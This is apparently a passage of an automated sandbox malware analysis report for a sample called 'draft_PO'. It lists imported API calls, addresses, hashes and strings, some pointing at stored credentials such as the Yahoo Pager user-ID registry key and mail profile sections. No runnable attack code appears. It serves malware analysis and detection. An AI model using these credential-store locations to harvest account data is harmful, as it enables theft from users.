                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                • String ID:
                                                                                • API String ID: 19018683-0
                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040644F
                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044495F
                                                                                • memset.MSVCRT ref: 00444978
                                                                                • memset.MSVCRT ref: 0044498C
                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen
                                                                                • String ID:
                                                                                • API String ID: 2142929671-0
                                                                                • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                  • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                • strlen.MSVCRT ref: 00408E4F
                                                                                • LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                • memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D5C
                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D7A
                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D98
                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408DA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                • String ID: strings
                                                                                • API String ID: 4036804644-3030018805
                                                                                • Opcode ID: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                                                • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                • Opcode Fuzzy Hash: fb972dfd3e57adfc3ba40d615c3f9c5d1a1752d68bd78c6c00ac9518cee6e209
                                                                                • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                APIs
                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                • memset.MSVCRT ref: 0040330B
                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                • String ID: Personalities
                                                                                • API String ID: 2103853322-4287407858
                                                                                • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00444573
                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValuememset
                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                • API String ID: 1830152886-1703613266
                                                                                • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?), ref: 00406D87
                                                                                • sprintf.MSVCRT ref: 00406DAF
                                                                                • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastMessagesprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 1670431679-1552265934
                                                                                • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0043DFC5
                                                                                • memset.MSVCRT ref: 0043DFFE
                                                                                • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID: $no query solution
                                                                                • API String ID: 368790112-326442043
                                                                                • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                APIs
                                                                                Strings
                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                • API String ID: 3510742995-272990098
                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: H
                                                                                • API String ID: 2221118986-2852464175
                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                • API String ID: 3510742995-3170954634
                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                APIs
                                                                                  • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 231171946-3708268960
                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: winWrite1$winWrite2
                                                                                • API String ID: 438689982-3457389245
                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: winRead
                                                                                • API String ID: 1297977491-2759563040
                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044955B
                                                                                • memset.MSVCRT ref: 0044956B
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: gj
                                                                                • API String ID: 1297977491-4203073231
                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                APIs
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                • API String ID: 3337535707-2769808009
                                                                                • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
